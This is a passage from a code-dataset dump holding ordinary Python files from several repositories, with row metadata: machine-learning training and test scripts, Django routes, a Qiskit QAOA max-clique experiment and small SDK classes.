parser.add_argument('--dir', type=str, default='./ckps/')
parser.add_argument('--subDir', type=str, default='resnet50_sev_cates_2500_0.99_naive_0_afm_0.7_u_0.3')
parser.add_argument('--dset_path', type=str, default='./data/semi_processed')
parser.add_argument('--seed', type=int, default=2021, help="random seed")
parser.add_argument('--which', type=str, default='one', choices=['one', 'all'])
parser.add_argument('--img_dir', type=str, default=None)
parser.add_argument('--save_dir', type=str, default=None)
parser.add_argument('--bin_class', type=str, default=None)
args = parser.parse_args()
if args.num_classes == 2:
args.label_names = [("not " + args.bin_class), args.bin_class]
else:
args.label_names = ['akiec', 'bcc', 'bkl', 'df', 'mel', 'nv', 'vasc']
if args.which == 'one':
args.net = osp.basename(args.subDir).split('_')[0]
# torch.backends.cudnn.deterministic = True
print(args.dir)
args.output_dir_train = os.path.join(args.dir, args.subDir)
print(args.output_dir_train)
args.output_dir = os.path.join('test', args.output_dir_train)
if not osp.exists(args.output_dir):
os.system('mkdir -p ' + args.output_dir)
if not osp.exists(args.output_dir):
os.makedirs(args.output_dir)
args.out_file = open(osp.join(args.output_dir, 'log.txt'), 'w')
args.out_file.write(print_args(args) + '\n')
args.out_file.flush()
test_target(args)
if args.which == 'all':
for dir in os.listdir(args.dir):
args.net = dir.split('_')[0]
# torch.backends.cudnn.deterministic = True
args.output_dir_train = os.path.join(args.dir, dir)
args.output_dir = os.path.join('./test', args.output_dir_train)
if not osp.exists(args.output_dir):
os.system('mkdir -p ' + args.output_dir)
if not osp.exists(args.output_dir):
os.makedirs(args.output_dir)
args.out_file = open(osp.join(args.output_dir, 'log.txt'), 'w')
args.out_file.write(print_args(args) + '\n')
args.out_file.flush()
test_target(args)
| 38.971264
| 113
| 0.626309
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,208
| 0.178145
|
c4009ade7b5eb056201eed0338579ec28e08eb56
| 226
|
py
|
Python
|
countdownhype/urls.py
|
chri4354/BeeMe_platform
|
b73843d9146c5ba54a63a8839980ee7c8024e80d
|
[
"CC-BY-4.0"
] | null | null | null |
countdownhype/urls.py
|
chri4354/BeeMe_platform
|
b73843d9146c5ba54a63a8839980ee7c8024e80d
|
[
"CC-BY-4.0"
] | 8
|
2020-06-06T01:55:55.000Z
|
2022-03-12T00:31:52.000Z
|
countdownhype/urls.py
|
chri4354/BeeMe_platform
|
b73843d9146c5ba54a63a8839980ee7c8024e80d
|
[
"CC-BY-4.0"
] | null | null | null |
from django.urls import path, re_path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('countdown/', views.countdown, name='countdown'),
#re_path(r'.+', views.redir, name='redir'),
]
| 22.6
| 58
| 0.650442
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 75
| 0.331858
|
c40260dc06f3a35df8d6b1598c7152ecade68c53
| 204
|
py
|
Python
|
argv.py
|
christoga/python
|
1395b3177e7baf46677a7a7a4ae89d2488c6f0fa
|
[
"MIT"
] | 5
|
2015-11-15T19:08:31.000Z
|
2015-11-27T02:34:28.000Z
|
argv.py
|
christoga/python
|
1395b3177e7baf46677a7a7a4ae89d2488c6f0fa
|
[
"MIT"
] | null | null | null |
argv.py
|
christoga/python
|
1395b3177e7baf46677a7a7a4ae89d2488c6f0fa
|
[
"MIT"
] | null | null | null |
from sys import argv
script, first, second, third = argv
print("This script called", script)
print("The first variable :", first)
print("The second variable :", second)
print("The third variable :", third)
| 22.666667
| 37
| 0.735294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 87
| 0.426471
|
c402fd47d18c33d2119498b3bf7f8c6a643683c4
| 545
|
py
|
Python
|
featureflow/feature_registration.py
|
featureflow/featureflow-python-sdk
|
a84cf54812fdc65d9aa52d10b17325504e67057f
|
[
"Apache-2.0"
] | null | null | null |
featureflow/feature_registration.py
|
featureflow/featureflow-python-sdk
|
a84cf54812fdc65d9aa52d10b17325504e67057f
|
[
"Apache-2.0"
] | null | null | null |
featureflow/feature_registration.py
|
featureflow/featureflow-python-sdk
|
a84cf54812fdc65d9aa52d10b17325504e67057f
|
[
"Apache-2.0"
] | 2
|
2020-06-01T05:37:16.000Z
|
2020-07-15T08:17:18.000Z
|
class FeatureRegistration:
def __init__(self, key, failoverVariant, variants=[]):
"""docstring for __init__"""
self.key = key
self.failoverVariant = failoverVariant
self.variants = [v.toJSON() for v in variants]
def toJSON(self):
"""docstring for toJSON"""
        return self.__dict__
class Variant:
def __init__(self, key, name):
"""docstring for __init__"""
self.key = key
self.name = name
def toJSON(self):
"""docstring for toJSON"""
        return self.__dict__
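# Illustrative usage (editorial sketch; the feature key and variant names below are made up):
#   reg = FeatureRegistration("example-feature", Variant("off", "Off"),
#                             variants=[Variant("on", "On"), Variant("off", "Off")])
#   payload = reg.toJSON()  # dict of the instance attributes; `variants` is already a list of dicts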
| 24.772727
| 58
| 0.594495
| 541
| 0.992661
| 0
| 0
| 0
| 0
| 0
| 0
| 108
| 0.198165
|
c403737a02fdcf7c798629d6151ff7c1e4a813cf
| 913
|
py
|
Python
|
ryu/gui/views/topology.py
|
uiuc-srg/ryu
|
2a597f812270ea9690269a20bf659f334c323eb6
|
[
"Apache-2.0"
] | 269
|
2015-03-08T11:32:45.000Z
|
2022-03-30T11:18:16.000Z
|
ryu/gui/views/topology.py
|
uiuc-srg/ryu
|
2a597f812270ea9690269a20bf659f334c323eb6
|
[
"Apache-2.0"
] | 4
|
2017-03-07T11:51:24.000Z
|
2020-07-07T20:13:55.000Z
|
ryu/gui/views/topology.py
|
uiuc-srg/ryu
|
2a597f812270ea9690269a20bf659f334c323eb6
|
[
"Apache-2.0"
] | 205
|
2015-01-13T04:52:25.000Z
|
2022-03-30T13:37:33.000Z
|
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import render_template, request
import view_base
class IndexView(view_base.ViewBase):
def __init__(self):
super(IndexView, self).__init__()
def run(self):
host, port = request.host.split(':')
return render_template('topology.html', host=host, port=port)
| 33.814815
| 69
| 0.739321
| 237
| 0.259584
| 0
| 0
| 0
| 0
| 0
| 0
| 616
| 0.674699
|
c4038c43fba700001a9ef9e5ce94db202c34c7bb
| 2,247
|
py
|
Python
|
allennlp/tests/modules/token_embedders/bag_of_word_counts_token_embedder_test.py
|
urigoren/allennlp
|
236e1fd01ca30409cd736625901292609009f5c4
|
[
"Apache-2.0"
] | 1
|
2020-03-30T14:07:02.000Z
|
2020-03-30T14:07:02.000Z
|
allennlp/tests/modules/token_embedders/bag_of_word_counts_token_embedder_test.py
|
urigoren/allennlp
|
236e1fd01ca30409cd736625901292609009f5c4
|
[
"Apache-2.0"
] | 123
|
2020-04-26T02:41:30.000Z
|
2021-08-02T21:18:00.000Z
|
allennlp/tests/modules/token_embedders/bag_of_word_counts_token_embedder_test.py
|
urigoren/allennlp
|
236e1fd01ca30409cd736625901292609009f5c4
|
[
"Apache-2.0"
] | 2
|
2019-12-21T05:58:44.000Z
|
2021-08-16T07:41:21.000Z
|
import numpy as np
import pytest
import torch
from numpy.testing import assert_almost_equal
from allennlp.common.checks import ConfigurationError
from allennlp.common.testing import AllenNlpTestCase
from allennlp.data import Vocabulary
from allennlp.modules.token_embedders import BagOfWordCountsTokenEmbedder
class TestBagOfWordCountsTokenEmbedder(AllenNlpTestCase):
def setUp(self):
super().setUp()
self.vocab = Vocabulary()
self.vocab.add_token_to_namespace("1")
self.vocab.add_token_to_namespace("2")
self.vocab.add_token_to_namespace("3")
self.vocab.add_token_to_namespace("4")
self.non_padded_vocab = Vocabulary(non_padded_namespaces=["tokens"])
def test_forward_calculates_bow_properly(self):
embedder = BagOfWordCountsTokenEmbedder(self.vocab)
numpy_tensor = np.array([[2, 0], [3, 0], [4, 4]])
inputs = torch.from_numpy(numpy_tensor)
embedder_output = embedder(inputs)
numpy_tensor = np.array([[0, 0, 1, 0, 0, 0], [0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 2, 0]])
manual_output = torch.from_numpy(numpy_tensor).float()
assert_almost_equal(embedder_output.data.numpy(), manual_output.data.numpy())
def test_zeros_out_unknown_tokens(self):
embedder = BagOfWordCountsTokenEmbedder(self.vocab, ignore_oov=True)
numpy_tensor = np.array([[1, 5], [2, 0], [4, 4]])
inputs = torch.from_numpy(numpy_tensor)
embedder_output = embedder(inputs)
numpy_tensor = np.array([[0, 0, 0, 0, 0, 1], [0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 2, 0]])
manual_output = torch.from_numpy(numpy_tensor).float()
assert_almost_equal(embedder_output.data.numpy(), manual_output.data.numpy())
def test_ignore_oov_should_fail_on_non_padded_vocab(self):
with pytest.raises(ConfigurationError):
BagOfWordCountsTokenEmbedder(self.non_padded_vocab, ignore_oov=True)
def test_projects_properly(self):
embedder = BagOfWordCountsTokenEmbedder(vocab=self.vocab, projection_dim=50)
numpy_tensor = np.array([[1, 0], [1, 0], [4, 4]])
inputs = torch.from_numpy(numpy_tensor)
embedder_output = embedder(inputs)
assert embedder_output.shape[1] == 50
| 44.94
| 93
| 0.696484
| 1,933
| 0.860258
| 0
| 0
| 0
| 0
| 0
| 0
| 20
| 0.008901
|
c404204e3c66a1ac63a04d196c9f1142497f7ef7
| 1,020
|
py
|
Python
|
dqn/ops.py
|
khurshedmemon/DQN-UN-TL
|
1a981feff66825b6c35aafd08aba29d3c08ed745
|
[
"Apache-2.0"
] | 1
|
2021-12-01T15:08:44.000Z
|
2021-12-01T15:08:44.000Z
|
dqn/ops.py
|
khurshedmemon/DQN-UN-TL
|
1a981feff66825b6c35aafd08aba29d3c08ed745
|
[
"Apache-2.0"
] | 1
|
2021-12-02T06:09:05.000Z
|
2021-12-02T06:09:05.000Z
|
dqn/ops.py
|
khurshedmemon/DQN-UN-TL
|
1a981feff66825b6c35aafd08aba29d3c08ed745
|
[
"Apache-2.0"
] | null | null | null |
import tensorflow as tf
import numpy as np
def clipped_error(x):
# Huber loss
try:
return tf.select(tf.abs(x) < 1.0, 0.5 * tf.square(x), tf.abs(x) - 0.5 )
except:
return tf.where(tf.abs(x) < 1.0, 0.5 * tf.square(x), tf.abs(x) - 0.5 )
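# Editorial note: the piecewise form above is the Huber loss with delta = 1
# (0.5 * x**2 when |x| < 1, |x| - 0.5 otherwise); tf.select was replaced by
# tf.where around TF 1.0, which is what the try/except fallback accounts for.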
def linear(input_, output_size, stddev=0.02, bias_start=0.0, activation_fn=None, name='linear', mask=None):
shape = input_.get_shape().as_list()
with tf.variable_scope(name):
w = tf.get_variable('Matrix', [shape[1], output_size], tf.float32,
tf.random_normal_initializer(stddev=stddev))
b = tf.get_variable('bias', [output_size],
initializer=tf.constant_initializer(bias_start))
out = tf.nn.bias_add(tf.matmul(input_, w), b)
#if mask is not None:
#out = tf.minimum(out, (2.0 * mask - 1.0) * np.finfo(np.float32).max)
if activation_fn is not None:
return activation_fn(out), w, b
else:
return out, w, b
| 32.903226
| 107
| 0.582353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 124
| 0.121569
|
c40422c343f9bc25ecff00b38032cd67afe03520
| 4,081
|
py
|
Python
|
cellsium/model/initialization.py
|
modsim/CellSium
|
8c3f4f5ccf84fa5555206d01cc3359c89071dcba
|
[
"BSD-2-Clause"
] | null | null | null |
cellsium/model/initialization.py
|
modsim/CellSium
|
8c3f4f5ccf84fa5555206d01cc3359c89071dcba
|
[
"BSD-2-Clause"
] | null | null | null |
cellsium/model/initialization.py
|
modsim/CellSium
|
8c3f4f5ccf84fa5555206d01cc3359c89071dcba
|
[
"BSD-2-Clause"
] | 1
|
2021-12-29T23:19:17.000Z
|
2021-12-29T23:19:17.000Z
|
"""Cell parameter random initializations."""
from typing import Any, Dict
import numpy as np
from ..parameters import (
Height,
NewCellBendLowerLower,
NewCellBendLowerUpper,
NewCellBendOverallLower,
NewCellBendOverallUpper,
NewCellBendUpperLower,
NewCellBendUpperUpper,
NewCellLength1Mean,
NewCellLength1Std,
NewCellLength2Mean,
NewCellLength2Std,
NewCellLengthAbsoluteMax,
NewCellLengthAbsoluteMin,
NewCellRadiusFromCenter,
NewCellWidthAbsoluteMax,
NewCellWidthAbsoluteMin,
NewCellWidthMean,
NewCellWidthStd,
Width,
)
from ..random import RRF, enforce_bounds
RandomSequenceType = Dict[str, Any]
class RandomWidthLength:
"""Random initializations for cell width/lengths."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
assert NewCellLength1Mean.value > NewCellWidthMean.value
assert NewCellLength2Mean.value > NewCellWidthMean.value
def ensure_length_greater_width(length, width):
for inner_length, inner_width in zip(length, width):
if inner_length > inner_width:
yield [inner_length, inner_width]
return dict(
length__width=RRF.chain(
ensure_length_greater_width,
length=RRF.compose(
lambda raw_lengths, choice: raw_lengths[choice],
raw_lengths=RRF.chain(
enforce_bounds,
iterator=sequence.multivariate_normal(
[NewCellLength1Mean.value, NewCellLength2Mean.value],
[
[NewCellLength1Std.value, 0.0],
[0.0, NewCellLength2Std.value],
],
),
minimum=NewCellLengthAbsoluteMin.value,
maximum=NewCellLengthAbsoluteMax.value,
),
choice=sequence.integers(0, 1),
),
width=RRF.chain(
enforce_bounds,
iterator=sequence.normal(
NewCellWidthMean.value, NewCellWidthStd.value
),
minimum=NewCellWidthAbsoluteMin.value,
maximum=NewCellWidthAbsoluteMax.value,
),
)
)
class RandomBentRod:
"""Random initializations for cell bent radii."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
return dict(
bend_overall=sequence.uniform(
NewCellBendOverallLower.value,
NewCellBendOverallUpper.value,
),
bend_upper=sequence.uniform(
NewCellBendUpperLower.value, NewCellBendUpperUpper.value
),
bend_lower=sequence.uniform(
NewCellBendLowerLower.value, NewCellBendLowerUpper.value
),
)
class RandomPosition:
"""Random initializations for cell positions."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
return dict(
position=RRF.compose(
lambda radius, angle: [
float(radius * np.cos(angle) + Width.value / 2),
float(radius * np.sin(angle) + Height.value / 2),
],
radius=sequence.uniform(0, NewCellRadiusFromCenter.value),
angle=RRF.wrap(sequence.uniform(0, 360.0), np.radians),
)
)
class RandomAngle:
"""Random initializations for cell angles."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
return dict(angle=RRF.wrap(sequence.uniform(0, 360.0), np.radians))
class RandomFluorescence:
"""Random initializations for fluorescences."""
@staticmethod
def random_sequences(sequence: RRF) -> RandomSequenceType:
return dict(fluorescences=sequence.uniform(0, 360.0, (1,)))
| 32.133858
| 81
| 0.589561
| 3,391
| 0.830924
| 1,656
| 0.405783
| 2,987
| 0.731928
| 0
| 0
| 285
| 0.069836
|
c4049f3019aff074a372d03e83e2c871a888286d
| 7,540
|
py
|
Python
|
QAOA_MaxClique.py
|
bernovie/QAOA-MaxClique
|
59b795480e019ae19d25ace274bdb86714ed49e2
|
[
"MIT"
] | 2
|
2020-06-19T06:58:11.000Z
|
2021-05-18T07:17:22.000Z
|
QAOA_MaxClique.py
|
bernovie/QAOA-MaxClique
|
59b795480e019ae19d25ace274bdb86714ed49e2
|
[
"MIT"
] | 1
|
2020-09-21T20:26:46.000Z
|
2020-09-21T20:26:46.000Z
|
QAOA_MaxClique.py
|
bernovie/QAOA-MaxClique
|
59b795480e019ae19d25ace274bdb86714ed49e2
|
[
"MIT"
] | 1
|
2020-09-20T12:42:02.000Z
|
2020-09-20T12:42:02.000Z
|
import qiskit
import numpy as np
import matplotlib.pyplot as plt
import json
from graph import *
# Random comment
P = 1
def makeCircuit(inbits, outbits):
q = qiskit.QuantumRegister(inbits+outbits)
c = qiskit.ClassicalRegister(inbits+outbits)
qc = qiskit.QuantumCircuit(q, c)
q_input = [q[i] for i in range(outbits,outbits+inbits)]
q_output = [q[j] for j in range(outbits)]
return qc, c, q_input, q_output
# measure all qubits in q_input register, return dictionary of samples
def measureInput(qc, q_input, c):
for i in range(len(q_input)):
qc.measure(q_input[i], c[i])
job = qiskit.execute(qc, backend='local_qasm_simulator', shots=1024)
return job.result().get_counts(qc)
def test5(qc, q_input, c):
data = measureInput(qc, q_input, c)
# assemble data from dictionary into list
parsed = []
xticks = []
n = len(q_input)
for i in range(2**n):
bits = np.binary_repr(i, width=n)
xticks.append(bits)
bits += "00"
if bits in data: parsed.append(data[bits])
else: parsed.append(0)
plt.bar(range(2**n), parsed)
plt.xticks(range(2**n),xticks,rotation="vertical")
plt.xlabel('Outcomes')
plt.ylabel('Counts')
plt.title('Measurement Histogram')
plt.show()
def applyQAOA(gamma, beta, graph):
### INIT REGS
qc, c, q_input, q_output = makeCircuit(graph.getNumNodes(), 1);
PENALTY = graph.getMaxEdges()
### H on every input register
for node in q_input:
qc.h(node)
complement = graph.getEdgesComp();
edges = graph.getEdges()
### APPLY V AND W
### APPLY V
# EDGES IN THE GRAPH
for edge in edges:
nodeList = edge.getNodes()
qc.cu1(-gamma, q_input[nodeList[0].name], q_input[nodeList[1].name])
# EDGES NOT IN THE GRAPH
for edge in complement:
nodeList = edge.getNodes()
qc.cu1(PENALTY*gamma, q_input[nodeList[0].name], q_input[nodeList[1].name])
### APPLY W
for node in q_input:
qc.h(node)
qc.u1(2*beta, node)
qc.h(node)
### Measure
results = measureInput(qc, q_input, c)
### Compute the result expectation
### Parse the result list.
# B/c we only care about counts associated with input register
# we combine the counts of states with same input register bits
counts = dict()
for key in results:
if key[1:] not in counts:
counts[key[1:]] = results[key]
else:
counts[key[1:]] += results[key]
#print(counts)
eox = 0
eox2 = 0
for val in counts:
cliqNum = 0
for edge in edges:
nodeList = edge.getNodes()
#print("Node 1:", nodeList[0].name,"Node 2:", nodeList[1].name)
if val[nodeList[0].name] == '1' and val[nodeList[1].name] == '1':
cliqNum += 1
for edge in complement:
nodeList = edge.getNodes()
if val[nodeList[0].name] == '1' and val[nodeList[1].name] == '1':
cliqNum -= PENALTY
eox += counts[val]/1024 * cliqNum
eox2 += (cliqNum**2) * counts[val]/1024
std = np.sqrt((len(counts)/(len(counts) -1))*(eox2 - eox**2))
return eox, std
### gradient ascent optimizer
# graph is graph to optimize over
# epsilon controls how far out the delta is calculated
# eta is learning rate
# threshold is the average of gamma and beta that we will consider a max
def optimize(graph, epsilon, eta, threshold):
count = 0
gamma = 2
beta = 2
    dgamma = (applyQAOA(gamma + epsilon, beta, graph)[0] - applyQAOA(gamma - epsilon, beta, graph)[0])/(2*epsilon)
    dbeta = (applyQAOA(gamma, beta + epsilon, graph)[0] - applyQAOA(gamma, beta - epsilon, graph)[0])/(2*epsilon)
flipper = True #Alternate between maxing gamma and maxing beta
while((abs(dgamma) + abs(dbeta))/2 > threshold):
if(flipper):
if (dgamma > 0):
gamma = (gamma + (dgamma * eta)) % (2*np.pi)
elif (dgamma < 0):
gamma = (gamma - (dgamma * eta)) % (2*np.pi)
            dgamma = (applyQAOA(gamma + epsilon, beta, graph)[0] - applyQAOA(gamma - epsilon, beta, graph)[0])/(2*epsilon)
else:
if(dbeta > 0):
beta = (beta + (dbeta * eta)) % np.pi
elif (dbeta < 0):
beta = (beta - (dbeta * eta)) % np.pi
            dbeta = (applyQAOA(gamma, beta + epsilon, graph)[0] - applyQAOA(gamma, beta - epsilon, graph)[0])/(2*epsilon)
count+=1
print("Count", count, "dg", dgamma, "db", dbeta)
flipper = not flipper
print(count)
return gamma, beta
def main():
###TESTING GRAPH
#0---1
#| / |
#3---2
myGraph = Graph(0, 0)
nodes = [Node(i) for i in range(4)]
edges = []
edges.append(Edge(nodes[0], nodes[1]))
edges.append(Edge(nodes[1], nodes[2]))
edges.append(Edge(nodes[2], nodes[3]))
edges.append(Edge(nodes[3], nodes[0]))
edges.append(Edge(nodes[3], nodes[1]))
for n in nodes:
myGraph.addNode(n)
for e in edges:
myGraph.addEdge(e)
### Run the algorithm
#expect = applyQAOA(gamma, beta, myGraph)
#print("Expectation Value:", expect)
### OPTIMIZE
#bestGamma, bestBeta = optimize(myGraph, 0.1, 0.1, 0.05)
#print("BestGamma: ", bestGamma, "bestBeta", bestBeta)
#print("Optimized Expectation value", applyQAOA(bestGamma, bestBeta, myGraph))
#print("Optimal Gamma:", bestGamma, "Optimal Beta:", bestBeta)
#BestGamma: 4.6015625 bestBeta 0.18702062766020688
#Optimized Expectation value -0.3115234375
### Make graphs.
# I'm thinking we hold one variable constant at its maxed value
# and vary the other and vice versa.
# Gamma has a larger range than beta. Do we want more data points for gamma than beta?
# The last page of the worksheet says exactly which graphs we need in our report
# so make sure we have at least those
BestGamma = 4.6015625
BestBeta = 0.18702062766020688
betas = np.linspace(0, np.pi, 10)
gammas = np.linspace(0, 2*np.pi, 100)
varyingBeta = []
varyingGamma = []
betaSTD = []
gammaSTD = []
y = []
std = []
for gammaa in gammas:
e, s = applyQAOA(gammaa, BestBeta, myGraph)
y.append(e)
std.append(s)
with open("varyingGamma.txt", 'w') as f:
json.dump(y, f)
with open("gammaSTD.txt", 'w') as f:
json.dump(std, f)
"""
y = []
std = []
for betaa in betas:
e, s = applyQAOA(BestGamma, betaa, myGraph)
y.append(e)
std.append(s)
with open("varyingBeta.txt", 'w') as f:
json.dump(y, f)
with open("betaSTD.txt", 'w') as f:
json.dump(std, f)
"""
with open("varyingGamma.txt", 'r') as f:
varyingGamma = json.load(f)
#with open("varyingBeta.txt", 'r') as f:
# varyingBeta = json.load(f)
#with open("betaSTD.txt", 'r') as f:
# betaSTD = json.load(f)
with open("gammaSTD.txt", 'r') as f:
gammaSTD = json.load(f)
#betaG = plt.errorbar(betas, varyingBeta, betaSTD, ecolor='black', elinewidth = 0.5, capsize=3)
gammaG = plt.errorbar(gammas, varyingGamma, gammaSTD, ecolor='black', elinewidth = 0.5, capsize=3)
plt.legend(('Gamma Graph',))
plt.xlabel('Gamma values')
plt.ylabel('Expectation Value')
plt.title('Expectation Value vs Gamma holding Beta constant')
plt.show()
main()
| 31.157025
| 116
| 0.589125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,395
| 0.317639
|
c406c0be47fb741172f1a8941c81701c0d28eb02
| 253
|
py
|
Python
|
yakut/cmd/file_server/__init__.py
|
pavel-kirienko/un
|
996e64668d8902bd876fab16b64e3361094a674d
|
[
"MIT"
] | 1
|
2020-12-23T22:59:12.000Z
|
2020-12-23T22:59:12.000Z
|
yakut/cmd/file_server/__init__.py
|
pavel-kirienko/un
|
996e64668d8902bd876fab16b64e3361094a674d
|
[
"MIT"
] | null | null | null |
yakut/cmd/file_server/__init__.py
|
pavel-kirienko/un
|
996e64668d8902bd876fab16b64e3361094a674d
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021 OpenCyphal
# This software is distributed under the terms of the MIT License.
# Author: Pavel Kirienko <pavel@opencyphal.org>
from ._app_descriptor import AppDescriptor as AppDescriptor
from ._cmd import file_server as file_server
| 36.142857
| 66
| 0.810277
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 144
| 0.56917
|
c407355017835f143ce6a0c84504a53fa41a83ee
| 15,959
|
py
|
Python
|
src/learn_mtfixbmodel.py
|
ornithos/pytorch-mtds-mocap
|
3ec10387d3d897e9a20d789bd4a3782a047519f7
|
[
"MIT"
] | 2
|
2022-02-09T17:53:31.000Z
|
2022-03-02T11:25:35.000Z
|
src/learn_mtfixbmodel.py
|
ornithos/pytorch-mtds-mocap
|
3ec10387d3d897e9a20d789bd4a3782a047519f7
|
[
"MIT"
] | null | null | null |
src/learn_mtfixbmodel.py
|
ornithos/pytorch-mtds-mocap
|
3ec10387d3d897e9a20d789bd4a3782a047519f7
|
[
"MIT"
] | null | null | null |
"""Simple code for training an RNN for motion prediction."""
import os
import sys
import time
import numpy as np
import torch
import torch.optim as optim
from torch.autograd import Variable
import mtfixb_model
import mtfixb_model2
import parseopts
def create_model(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
if len(args.load) > 0:
print("Loading model")
model = torch.load(args.load, map_location="cpu") if args.use_cpu else torch.load(args.load)
return model
if args.k == 0:
return create_model_k0(args, total_num_batches)
if args.dynamicsdict:
return create_model_DD(args, total_num_batches)
if args.biasonly:
return create_model_BiasOnly(args, total_num_batches)
if args.nobias:
return create_model_NoMTBias(args, total_num_batches)
model = mtfixb_model.MTGRU(
args.seq_length_out,
args.decoder_size,
args.decoder_size2,
args.batch_size,
total_num_batches,
args.k,
args.size_psi_hidden,
args.size_psi_lowrank,
args.bottleneck,
output_dim=args.human_size,
input_dim=args.input_size,
dropout=args.dropout_p,
residual_output=args.residual_velocities,
init_state_noise=args.init_state_noise,
mt_rnn=args.mt_rnn,
psi_affine=args.psi_affine,
)
if len(args.load) <= 0:
if len(args.load_layer1) > 0:
print("Loading GRU2 model")
model = load_layer1(model, args.load_layer1, args.use_cpu)
return model
print("Loading model")
model = torch.load(args.load, map_location="cpu") if args.use_cpu else torch.load(args.load)
return model
def create_model_k0(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
model = mtfixb_model.OpenLoopGRU(
args.seq_length_out,
args.decoder_size,
args.batch_size,
args.human_size,
args.input_size,
args.dropout_p,
args.residual_velocities,
args.init_state_noise,
)
return model
def create_model_DD(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
if len(args.load_layer1) > 0:
        raise NotImplementedError("Layer 1 load not yet implemented for Dynamics Dict.")
model = mtfixb_model.DynamicsDict(
args.seq_length_out,
args.decoder_size,
total_num_batches,
args.batch_size,
args.k,
args.size_psi_hidden,
args.size_psi_lowrank,
args.human_size,
args.input_size,
args.dropout_p,
args.residual_velocities,
args.init_state_noise,
)
return model
def create_model_BiasOnly(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
if len(args.load_layer1) > 0:
        raise NotImplementedError("Layer 1 load not yet implemented for MT Bias Only.")
model = mtfixb_model.MTGRU_BiasOnly(
args.seq_length_out,
args.decoder_size,
args.decoder_size2,
args.batch_size,
total_num_batches,
args.k,
args.size_psi_hidden,
args.size_psi_lowrank,
args.bottleneck,
output_dim=args.human_size,
input_dim=args.input_size,
dropout=args.dropout_p,
residual_output=args.residual_velocities,
init_state_noise=args.init_state_noise,
)
return model
def create_model_NoMTBias(args, total_num_batches):
"""Create MT model and initialize or load parameters in session."""
if len(args.load_layer1) > 0:
NotImplementedError("Layer 1 load not yet implemented for MT Bias Only.")
model = mtfixb_model2.MTGRU_NoBias(
args.seq_length_out,
args.decoder_size,
args.decoder_size2,
args.batch_size,
total_num_batches,
args.k,
args.size_psi_hidden,
args.size_psi_lowrank,
args.bottleneck,
output_dim=args.human_size,
input_dim=args.input_size,
dropout=args.dropout_p,
residual_output=args.residual_velocities,
init_state_noise=args.init_state_noise,
mt_rnn=args.mt_rnn,
psi_affine=args.psi_affine,
)
return model
def train(args):
"""Train a MT model on human motion"""
train_iter = read_all_data(args)
train_iter.shuffle()
total_num_batches = train_iter.total_length()
model = create_model(args, total_num_batches)
model = model if args.use_cpu else model.cuda()
has_weight = not np.isclose(args.first3_prec, 1.0)
is_hard_em = args.hard_em_iters > 0
is_MT = args.k > 0
current_step = 0
previous_losses = []
step_time, loss = 0, 0
mt_lr = args.learning_rate_mt if args.learning_rate_mt >= 0 else args.learning_rate
z_lr = args.learning_rate_z if args.learning_rate_z >= 0 else args.learning_rate
zls_lr = 0 if is_hard_em else z_lr
pars_lrs, zls_ix = model.get_params_optim_dicts(mt_lr, args.learning_rate, z_lr, zls_lr=zls_lr)
if args.optimiser.upper() == "SGD":
optimiser = optim.SGD(pars_lrs, weight_decay=args.weight_decay)
elif args.optimiser.upper() == "NESTEROV":
optimiser = optim.SGD(pars_lrs, momentum=0.8, nesterov=True, weight_decay=args.weight_decay)
elif args.optimiser.upper() == "ADAM":
optimiser = optim.Adam(pars_lrs, betas=(0.9, 0.999), weight_decay=args.weight_decay)
else:
        raise ValueError("Unknown optimiser type: {}. Try 'SGD', 'Nesterov' or 'Adam'".format(args.optimiser))
has_ar_noise = args.ar_coef > 0
device = "cpu" if args.use_cpu else "cuda"
if has_ar_noise:
assert args.ar_coef < 1, "ar_coef must be in [0, 1)."
# Construct banded AR precision matrix (fn def below)
Prec = ar_prec_matrix(args.ar_coef, args.seq_length_out).float().to(device)
for _ in range(args.iterations):
optimiser.zero_grad()
model.train()
start_time = time.time()
# ------------------------------------------------------- TRAINING
inputs, outputs, c_ids = model.get_batch(train_iter)
inputs, outputs = torchify(inputs, outputs, device=device)
if is_MT:
mu = model.mt_net.Z_mu[c_ids, :]
sd = torch.sigmoid(3 * model.mt_net.Z_logit_s[c_ids, :])
preds, _state = model(inputs, mu, sd)
else:
preds, _state = model(inputs)
err = preds - outputs
if has_weight:
err = err * torch.cat(
(torch.ones(1, 1, 3) * np.sqrt(args.first3_prec), torch.ones(1, 1, args.human_size - 3)), dim=2
).to(err.device)
if not has_ar_noise:
sqerr = err ** 2
else:
sqerr = (Prec @ err) * err
step_loss = args.human_size * args.seq_length_out * sqerr.mean() / 2
# assume \sigma is const. wrt optimisation, and hence normalising constant can be ignored.
# Now for KL term. Since we're descending *negative* L.B., we need to *ADD* KL to loss:
if is_MT:
logstd = torch.log(sd)
KLD = -0.5 * torch.sum(1 + 2 * logstd - mu.pow(2) - torch.exp(2 * logstd))
step_loss = step_loss + KLD
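            # (Editorial note, hedged) KLD above is the closed-form KL( N(mu, sd^2) || N(0, 1) )
            # summed over latent dimensions, KL = -0.5 * sum(1 + log(sd^2) - mu^2 - sd^2),
            # using log(sd^2) = 2*logstd and sd^2 = exp(2*logstd).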
